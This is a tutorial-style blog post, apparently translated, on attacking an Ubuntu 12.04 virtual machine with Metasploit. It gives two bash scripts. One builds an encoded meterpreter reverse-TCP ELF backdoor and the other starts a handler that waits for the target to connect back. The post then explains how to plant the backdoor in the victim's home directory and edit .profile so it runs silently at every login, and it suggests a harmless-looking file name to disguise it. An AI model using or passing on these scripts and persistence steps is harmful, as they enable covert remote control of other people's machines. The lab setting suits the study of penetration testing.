Metasploit penetration testing of Ubuntu 12.04 (1)

Metasploit penetration testing of Ubuntu 12.04 (1)

This article is mainly about entertaining exercises. Share the Attack Details, including some script files from various sources modified by the original author. The Penetration Process is not the focus. The biggest reason is that the second half of the article is still worth learning about persistence attacks. By the way, you can familiarize yourself with the MSF framework again. Hope to help you.

Attack environment:

Ubuntu12.04LTS 32bit (target, default software installation configuration)

VirtualBox

Metasploit framework (Latest Version)

Debian Squeeze 64bit (attacker)

First, we need to prepare a simple bash script for the binary ELF Executable File generator, so that subsequent work can be much easier. Then place the script in the Metasploit home directory:

 
 

  
  
#!/bin/bash  
  
  
clear  
  
  
echo"************************************************"  
  
  
echo " LINUX ELF BINARY GENERATOR FOR METASPLOIT    *"  
  
  
echo"************************************************"  
  
  
echo -e "What IP are we gonna use  ex. 192.168.0.1?  \c"  
  
  
read IP  
  
  
echo -e "What Port Number are we gonnalisten to? : \c"  
  
  
read port  
  
  
./msfpayloadlinux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$port R| ./msfencode -t elf-e x86/shikata_ga_nai >> Executive  
  
  
echo "Executive binarygenerated.."  
  
  
chmod u=rwx Executive  
  
  
ls -la Executive 
 
 

After running the script and performing simple configuration, we have a binary executable file named Executive.

Next, we need to start a listener on the attacker to wait for the target to actively connect, because we use the World-Wide reverse backdoor! To work more simply (zhuang) single (bi), I wrote another bash here, and then put the bash file under the Home Directory of Metasploit:

 
 

  
  
#!/bin/bash  
  
  
clear  
  
  
echo"*********************************************"  
  
  
echo "   METASPLOIT LINUX METERPRETER LISTENER    *"  
  
  
echo"*********************************************"  
  
  
echo "Here is a network device listavailable on yor machine"  
  
  
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'  
  
  
echo -e "What network interface are wegonna use ?  \c"  
  
  
read interface  
  
  
echo -e "What Port Number are we gonnalisten to? : \c"  
  
  
read port  
  
  
# Get OS name  
  
  
OS=`uname`  
  
  
IO="" # store IP  
  
  
case $OS in  
  
  
  Linux) IP=`/sbin/ifconfig $interface | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print$1}'`;;  
  
  
   *)IP="Unknown";;  
  
  
esac  
  
  
echo "      starting the meterpreter listener.."  
  
  
./msfcli exploit/multi/handler  PAYLOAD=linux/x86/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port  E 
 
 

Okay, the listener generation is complete, and then we need to transfer the backdoor Trojan to the Ubuntu target in a variety of cumbersome ways. Because this is an exercise, we directly put the ELF file in the victim machine for execution.

The figure below shows a strong voice

Now we have successfully executed this unknown binary file on the target. When we double-click this file, there is no response (the backdoor injection is king at this time), but the listening on our attacker already has the result:

What then? Now we have a meterpreter shell, but how can we get the root permission? The next step is the most interesting part: Next, we will place a backdoor file in the home of the target, and modify the. profile file so that our backdoor will be executed every time the target is started. To do this, we first need to download the. profile file of the target:

We added a little bit of content in the file to ensure that every login can successfully execute our backdoor file. Here we add. /executive (the generated backdoor file name is used. Here we can start some tempting names, such as sys. conf, but make sure that the file has executable + x permissions)

Then we will send the modified. profile file back to the target.

Next, we upload our ELF binary executable file to the home Directory of the target and change it to executive. At the same time, ensure that the file has the RWX attribute.

 

Now we get a simple persistent backdoor. Every time the target starts up, we can get an online shell, and the file is silently executed without any preservatives.

Okay. We have finished the first step of persistence. What can we do next?